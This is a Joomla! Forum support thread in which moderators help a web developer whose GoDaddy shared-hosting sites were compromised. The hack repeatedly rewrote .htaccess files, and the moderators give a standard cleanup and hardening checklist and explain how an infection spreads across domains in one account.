The Joomla! Forum ™

please do an extended version of the fpa with the extensions listed.
run through checklist 7 as linked from the "before you post read this sticky"
what is your host?

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}

Godaddy shared hosting

Finally got the sites stable by inserting a generic htaccess file and immediately changing the permissions to 444. One that had crashed, I was able to restore with a akeeba backup. But one will not restore, the script is interfering with the installation phase of restore.

I was able to see looking over several domains that the files were injected at the same time to each folder. An hour apart, each hour. Not sure if it is coming from within my partition, or across the shared server. GoDaddy. I changed all pw, login and scanned my PC. Confident the script resides within the server.

ask on the godaddy forums if anyone else has the same issue

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}

nothing on GoDaddy Forums helpful.

I do have two accounts, each has about 20-30 sites. One is totally clean, the other dirty. The dirty site, every site folder root had this corrupt file in it.

I thought I had them locked down, the htaccess files that I had inserted and changed the permissions to 444 were rewritten over again.

Then there is possibly a root type script (c99,r57 are just 2 there are many more) on the server, or one or more of these scripts on your sites that is allowing the hacker to sit at his computer and do as he wishes (server and all sites show up as a drive on the hackers computer. No passwords needed) with your sites/domain(s) or with the server. There could also be a cron job setup to make certain hacking edits/additions to your site.

You need to inform your host of the issues your having and the possibility of a root type script on the server. Just asking a host about an hacking issue with their servers will get nowhere. They will give a standard boilerplate answer of nothing is wrong with our stuff. This is what you already got in response, so don't ask; tell them there is an issue and a possible root kit installed on the server somewhere and they need to check their server for one. Certain hosts have had this issue a number of times in the recent past.

Your going to have to password protect the public_html directory of every domain and/or site under your account to start with. This may slow down or possibly stop the issue if it is an external access until you can fix it properly.

You must go through every site and delete every file and replace every file with known good ones. as the first point below suggests and security checklist 7 suggests. You should also check for cron jobs running assisting in the hack and you should make sure anonymous ftp is not enabled.

[ ] Delete all files and directories in your Joomla installation area which would be your public_html directory. Replace the deleted files with fresh copies of a current full version of Joomla, and fresh copies of extensions and templates used. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted in files and directories and or any added files or directories (may or may not be hidden within legitimate directories) not associated with your site.

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist checklist 7 to make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777, but ideal is 644 and 755

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

It appears to be a root script. In following your suggestion I called Host back again.
They would do nothing without me buying something, so I bought the virus scan.

I received an email a couple of hours later telling me they had found "Warning or Critical Issues on your website".

They email provided a link which told me how I could talk to a rep about paying to have the issues explained to me. Passing on that one. Not going to fill white space complaining about having an issue in the root fixed.

I have not had an a new incident x 7 hours.

Time for a dedicated server.

I would suggest you investigate other hosting services companies if your looking to make an upgrade to dedicated. A good place to research and ask questions is on Web Hosting Talk http://www.webhostingtalk.com/

Typically in some situations what happens is a vulnerability in a website is exploited and what is called a 'root kit' is installed. This kit can be as simple as a single but very powerful script that gives the hacker the ability to access the account under which it is installed without needing any passwords or usernames. On some hosting services, including some very popular ones, security is not all that good and the script can easily gain access to the rest of the accounts installed on the server without needing usernames/passwords and can also gain access to the 'root' or underlying software of the server also without needing usernames or passwords.

So, I would still consider replacing files within each site with known good ones or freshly downloaded ones and I would also think about following what I posted above and check for cron jobs etc. that you did not create. I would do this even if there are no more issues and I would also do this if you decide to go dedicated. You don't know if the sites are in fact clean or if there are backdoors dropped within the site(s) somewhere that will allow later easy access to a hacker. Joomla consists of hundreds of directories and thousands of files. It is very easy to miss a few bad files/directories even when using a "anti-virus script", especially since the script is not tailored to any individual site and tends to depend upon certain assumed parameters for detection.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

The reason I have stayed with shared hosted is that I am not comfortable with my technical knowledge on the server side. And my company size and income on hosting does not provide for me having more tech help. Safer, faster shared hosting is ideal for me at this point, as all I do is build and set-up sites. I tried virtual hosting and was very unhappy with the speed. Was in fact slower than one of my shared hosting accounts.

I will take your advice and begin replacing everything on this server as I bring them back up. Just very thankful that I had keep two hosting accounts and am only having to repair half. Thank you for you assistance, saved my butt.

VPS is in fact many times much slower than shared.

Managed dedicated is one way to go dedicated but still have certain aspects such as server software updates managed for you. There are various levels of this and this is not VPS. You get the whole server. Watch for the amount of memory though, more is better.

Shared, is ok most of the time if you find a good host. notice I did not say popular, expensive, cheap host. Do research on places such as Web Hosting Talk that are likely to tell the truth about their hosting service selection and experiences with them.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

As I have been cleaning, I have received a couple of emails from GoD.



I replied that I did not have a sub with that name.

After I had allowed a directory list, I see that this is the images folder for the server.
I realize that access could have been allowed through my content, but script is beyond my reach.

I have had this page come up a couple of times as I have been working. It comes up only on Firefox, not explorer. It seems to be associated with error responses.

BTW. I have no Cron-jobs, I have the errors going to a very simple errror.html page.

See my post above for what you should be doing: viewtopic.php?f=621&t=705221&p=2773573#p2772744

OK, as I understand from previous messages in this thread you are on a shared hosting account with your selected host service. Since you have so many sites you may have a reseller account to manage them. Now, I fail to understand why you think you do not have access to certain parts of your domain/site. If you have a reseller account then you have access through that to every account and probably also by ftp as each domain/site under your account is really just a directory. If just a regular shared account with unlimited domains or something to that effect, then each domain is again basically just a directory and accessible from the main account and from ftp.

It is very common to place code within established directories such as the images directory in a Joomla install and is one reason why you should be following the checklist. On shared hosting you will not be able to see or even check what is within directories outside of your master account(s)

The script does not have to be residing on the server someplace out of your reach to infect all of your sites on your account. From my understanding of previous posts, All of your sites are controlled by your two master accounts. One of these accounts (the dirty one) has a site that was originally infected and hacked. The hack script placed there on that original site has replicated itself to all other domains/sites within that master account. They did not need any type of password or user name to do this. This is called cross site contamination and is very similar to cross site scripting, the difference being cross contamination is localized to an account and the domains within that account and cross site involves different accounts on the server affecting all domains within each account. Cross contamination is generally your problem and cross site is your hosts problem. Think of a reseller as a mini-host. Your hosting those 40 - 60 sites and by doing so you are accepting some of the responsibility and should know how to fix things easily and quickly within your master accounts.

Each of the domains you have will have their own access to cron and each domain needs to be checked.



This is a redirect to the malware site. The site this is on is likely being redirected to the malware site.

Hackers can install complete domains and or sub-domains on a site and serve whatever they want from there. This will show in the logs and in traffic reports, but you have to read them. You should also be familiar with the normal content of your accounts.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

The folder the message refers to is not on a site. It is within /public_html, a level up from my key account on this shared host. It contains icons associated with Apache, PHP admin, ...,. I believe it is associated with account management for my account. It is not visible from FTP view of the account. This view provides a view of the primary and all alias domains.

As follows is what I have been able to determine:
1. Hacker gained access on one of my 1.5 sites. I believe through community builder.
2. Once in on this account, changed all my htaccess files on this shared account. All domains.
3. In the root of my account is a folder /icons; this folder is part of the hosts admin for my account. I figured out how to allow to list the directory. Do not see any scripts or items other than .gif .png .jpg ..,., nothing with a recent date either.

/
/domainone.co_
/domaintwo.co_
/domainthree./co_

Two things that happened that caused the cascading changes of my htaccess to stop.
1. I notified GoD and enrolled in their paid security, daily scan. Perhaps causing them to changes a property.
2. Installed admin Tools Pro and locked them all down.
I list both because I am not sure which stopped the changes from happening.

now to me that says you are reselling space under your account, unless they all belong to and are administered by you?

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}

I do not resell space. I develop and manage mostly joomla websites on multiple unlimited shared hosting accounts. Not sure which rule this is infringing on but I have not attempted to mislead on that fact.

Your not infringing on "any" rule. we are just trying to determine your setup.

It appears that either you have a reseller account which would be a "master" account under which any other domain accounts are created.
OR
You have a regular (non-reseller) account which allows multiple domain setups. These multiple domain setups are also within a "master" account under which they were created.

The risk associated with either of these methods is one site under the 'master' account can become compromised in such a way as to enable ALL the other domains under that 'master' account to become infected.

In your example, your showing a master account which you control and have a number of other separate domains within that account. Each 'domain' is essentially just a directory within the master account. Each domain will have it's own public_html directory that will also probably contain their own cgi directory.

A reseller account generally allows whoever you 'sold' space for their domain use to access their domains own control panel using their own login.

If your not using a reseller account then you have only one control panel (and thus login) to access all the domains. anyone you 'sold' a domain to does not have access to any domain control panel (c-panel) for their domain.

I would say a reseller account with separate c-panel login for each domain is a little more secure than just creating domains.

/ ----------->> your master account root directory
/domainone.co_ -------------->> directory 1 within the master account
/domaintwo.co_ -------------->> directory 2 within the master account
/domainthree./co_ -------------->> directory 3 within the master account

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

I see, I get the point you are making now.

Subscribing. I can attest that I'm having the same experience.
Haven't found the source yet.
J1.5.26 - My .htaccess keeps being rewritten to redirect to a .ru site only when the user googles our site and clicks our link. Going to directly to our site does not redirect the user.

Once I find the source of the script, will post again. Thank you for your assistance with posting this issue. Sidenote: Using HostMonster for VPS

Tim

See thread for htaccess hacked:
viewtopic.php?f=432&t=705216

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator